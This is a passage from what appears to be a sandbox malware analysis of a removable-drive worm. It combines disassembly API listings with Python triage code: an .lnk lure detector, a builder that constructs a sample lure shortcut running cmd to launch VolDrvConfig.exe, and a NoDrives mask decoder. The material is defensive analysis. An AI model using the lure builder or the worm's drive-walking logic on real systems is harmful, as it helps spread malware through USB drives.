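            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


# Pattern of the format string seen in the sample: "/c start %s & start %s\VolDrvConfig.exe".
LURE_ARGS = re.compile(r"/c\s+start\s+\S+\s*&\s*start\s+\S+\.exe\b", re.IGNORECASE)


def looks_like_drive_lure(fields: Dict[str, str]) -> bool:
    """Heuristic: a link that runs cmd to open a folder and an executable in one go."""
    target = fields.get("relative_path", "").lower()
    via_cmd = "%comspec%" in target or target.endswith("cmd.exe")
    return via_cmd and LURE_ARGS.search(fields.get("arguments", "")) is not None


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal Unicode .lnk carrying only RELATIVE_PATH and arguments."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
              + struct.pack("<II", flags, 0)              # LinkFlags, FileAttributes
              + b"\0" * 24                                 # Creation/Access/WriteTime
              + struct.pack("<IIIHHII", 0, 0, 1, 0, 0, 0, 0))  # FileSize, IconIndex, SW_SHOWNORMAL, HotKey, Reserved1-3

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed samples; "E:\data" is a placeholder, not a path from the analysis.
SAMPLE_LURE = build_lnk("%comspec%", r"/c start E:\ & start E:\data\VolDrvConfig.exe")
SAMPLE_BENIGN = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "")
```

On a suspect removable drive, feeding every *.lnk through parse_lnk_strings and looks_like_drive_lure gives a quick triage; a full triage would also resolve the IDList target, which this parser deliberately skips.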
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction ID: 0db10e415d6a1e8faee94fa1aa357f29b7cea0d9451b7bd8199af60d13ceb70c
                                              • Opcode Fuzzy Hash: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction Fuzzy Hash: 98312AB5E0020ADFCB14DF99D884BAFB7B5BF88304F108569E514B7390D778AA81CB94
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction ID: f860d819dcfac7245c0065b1f48ab1f28a181454cf029f87bdd60df825f867a0
                                              • Opcode Fuzzy Hash: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction Fuzzy Hash: B9311D74A0020A9FCB04CF99D884FEFB7B5BF88304F148969E514B7390D778AA85CB95
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                              • String ID: %s%s
                                              • API String ID: 1447977647-3252725368
                                              • Opcode ID: b3aa12a9ac6c1bea71ad27052cd7355f0876685bd87c0f59df55197cdbb1ba38
                                              • Instruction ID: 945b1e68ff25bd35ce4625b60af53a64f9c21a9b46b3aa14aa85a39d9b5f9782
                                              • Opcode Fuzzy Hash: b3aa12a9ac6c1bea71ad27052cd7355f0876685bd87c0f59df55197cdbb1ba38
                                              • Instruction Fuzzy Hash: 5D310DB4C00218EFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF59
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00406346
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                              • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              Strings
                                              • NoDrives, xrefs: 004063B8
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                              • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
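GetLogicalDrives returns a 26-bit mask (bit 0 = A:, bit 25 = Z:), and the NoDrives policy value read here under HKEY_LOCAL_MACHINE with a 4-byte buffer is a REG_DWORD in the same layout, listing drives Explorer must hide. The Python below, an added example and not code from the report or from the sample, decodes both masks and derives the drive list a worm that honours the policy would walk. How the sample actually combines the two values is not visible in the listing, so the combination rule is an assumption, and the .reg export it parses is constructed.

```python
import re
from typing import Iterable, List, Optional

DRIVE_LETTERS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ALL_DRIVES = (1 << 26) - 1            # 0x03FFFFFF, the bits both masks can use

# One line of a .reg export of the Explorer policy key, e.g. "NoDrives"=dword:00000010
REG_DWORD_LINE = re.compile(r'^\s*"NoDrives"\s*=\s*dword:([0-9A-Fa-f]{1,8})\s*$', re.IGNORECASE)


def mask_to_letters(mask: int) -> List[str]:
    """Bit n set -> letter n: the layout GetLogicalDrives() returns and NoDrives uses."""
    return [DRIVE_LETTERS[i] for i in range(26) if (mask >> i) & 1]


def letters_to_mask(letters: Iterable[str]) -> int:
    """Inverse of mask_to_letters; accepts 'C', 'c:' or 'C:\\'."""
    mask = 0
    for letter in letters:
        mask |= 1 << DRIVE_LETTERS.index(letter.strip()[0].upper())
    return mask


def parse_nodrives_export(reg_text: str) -> Optional[int]:
    """Pull the NoDrives DWORD out of a .reg export; None if the value is not set."""
    for line in reg_text.splitlines():
        m = REG_DWORD_LINE.match(line)
        if m:
            return int(m.group(1), 16)
    return None


def candidate_drives(logical_drives: int, nodrives: Optional[int]) -> List[str]:
    """Drives that exist and are not hidden from Explorer by the NoDrives policy.

    nodrives=None models RegQueryValueExW failing because the value is absent
    (the cbData of 4 in the listing matches a REG_DWORD), in which case nothing
    is hidden. Assumption, not shown in the listing: the sample drops
    policy-hidden drives rather than targeting them specifically.
    """
    hidden = nodrives or 0
    return mask_to_letters(logical_drives & ~hidden & ALL_DRIVES)


# Constructed inputs, not values observed in the analysis.
SAMPLE_LOGICAL_DRIVES = letters_to_mask(["C:", "D:", "E:"])          # 0x1C
SAMPLE_REG_EXPORT = (
    "[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer]\n"
    '"NoDrives"=dword:00000010\n'
)
```

With E: hidden by policy the constructed inputs leave C: and D: as candidates; a NoDrives of 0x03FFFFFF hides everything, which is why an environment that sets that value sees no drive-walking from code that honours it.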
                                              APIs
                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D7E0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D820
                                                • Part of subcall function 0040D7E0: CloseHandle.KERNEL32(?), ref: 0040D839
                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2251373460-0
                                              • Opcode ID: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction ID: 832ae4800ebcb00f90e7428fbbdd4da527039cf188cbed956f615c5464689476
                                              • Opcode Fuzzy Hash: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction Fuzzy Hash: 2C31F874A00208EFDB04DF94D889F9EBBB5FB49304F0085A9E905A7390D775AA95CF54
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID:
                                              • API String ID: 673498613-0
                                              • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction ID: c7f26e6fe3f6e47823c68d9e93f939c843ab0f3ebbce24f5146439a699fa7f9b
                                              • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction Fuzzy Hash: CC114F326005186B8B10EF9EC44269ABBD6EF84360B15C136FC2CCF319D634D9414BD4
                                              APIs
                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                              • htons.WS2_32(?), ref: 00401281
                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                              • String ID: pdu
                                              • API String ID: 2164660128-2320407122
                                              • Opcode ID: 8ae6570444e5f91760108b530f1a08cb32bd2fc07e3f7a4ef94bae8ae05db212
                                              • Instruction ID: 395797021da18ac5dc0c4ab187d218299f1ec32cbdde21a351b7e81b9c40248d
                                              • Opcode Fuzzy Hash: 8ae6570444e5f91760108b530f1a08cb32bd2fc07e3f7a4ef94bae8ae05db212
                                              • Instruction Fuzzy Hash: E83180762083009BC710DF69D884A9BBBF4AFC9714F04456EFD9897381D634D91587AB
                                              APIs
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                              • String ID:
                                              • API String ID: 3966618661-0
                                              • Opcode ID: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction ID: 36d18bb318df5a029dedd03b2acd005dba350197efc47ce95ae0e9b03ff24c88
                                              • Opcode Fuzzy Hash: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction Fuzzy Hash: 7241A175604A01ABC714EB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99
                                              APIs
                                              • CreateFileW.KERNEL32(00417D28,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B1A8
                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B1C9
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B1D3
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B1DD
                                              • InterlockedExchange.KERNEL32(00416900,0000003D), ref: 0040B1EA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                              • String ID:
                                              • API String ID: 442028454-0
                                              • Opcode ID: a0a4e6ae3ed30183f399e8ba9aee31b57bdf5208d54d0e8c38c9924f8c3679e4
                                              • Instruction ID: c603907199676edbd5c7d0fa982afae34b74f891853afe3642d2180ffa8dca70
                                              • Opcode Fuzzy Hash: a0a4e6ae3ed30183f399e8ba9aee31b57bdf5208d54d0e8c38c9924f8c3679e4
                                              • Instruction Fuzzy Hash: 8D313EB4A40209EBCB14DF94EC85FAEB7B4FB48300F20C569E515673D0D774AA41DB99
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl
                                              • String ID:
                                              • API String ID: 435966717-0
                                              • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction ID: 6393123168de4f4826dca7712cb04f948d5e4027293efa58ed578d500b7b4a08
                                              • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction Fuzzy Hash: DDF03172901428AB9750EEFF84424CBF7E6AF9C368B219176FC18E3260E9709D0546F2
                                              APIs
                                              • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                              • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                              • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                                • Part of subcall function 0040A740: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A79B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                              • String ID: pdu
                                              • API String ID: 309973729-2320407122
                                              • Opcode ID: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction ID: d282b52b3110f6f030980250f42d45aa65f4851f6724e2164e4de9b2c85264d0
                                              • Opcode Fuzzy Hash: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction Fuzzy Hash: 6101D6765003009BCB20AF51ECC0E9B7779AF48311704467AFD04AB396C738E84187B9
                                              APIs
                                              • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                              • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                              • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                              APIs
                                              • ioctlsocket.WS2_32 ref: 0040112B
                                              • recvfrom.WS2_32 ref: 0040119C
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                              • String ID:
                                              • API String ID: 3980219359-0
                                              • Opcode ID: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction ID: e1b7ef358c802af59afb00f280b99e3e8e19274dac2adc7c4e0c886c1a13037e
                                              • Opcode Fuzzy Hash: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction Fuzzy Hash: 1521C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF555A62A0E774DD488BEA
                                              APIs
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                              • String ID:
                                              • API String ID: 2074799992-0
                                              • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                              • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                              APIs
                                              • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                              • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                              • Sleep.KERNEL32(000003E8), ref: 00407361
                                              • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CacheDeleteEntry$Sleep
                                              • String ID:
                                              • API String ID: 672405725-0
                                              • Opcode ID: de31647e4212ff5a036519ed2976cc2a7ac52ffd671279e5da701e067ce87bdf
                                              • Instruction ID: 2037616d4c8183bc1dcd880db7f677971b3714fceeeaba453b7e7dde7ca31e21
                                              • Opcode Fuzzy Hash: de31647e4212ff5a036519ed2976cc2a7ac52ffd671279e5da701e067ce87bdf
                                              • Instruction Fuzzy Hash: CC217F75E04208FBDB04DFA4D885B9EBB74AF45305F10C1B9ED016B391D679AA80DB49
                                              APIs
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                              • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                              • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Recv$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 3668019968-0
                                              • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                              • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                              APIs
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Send$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 2121970615-0
                                              • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                              • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
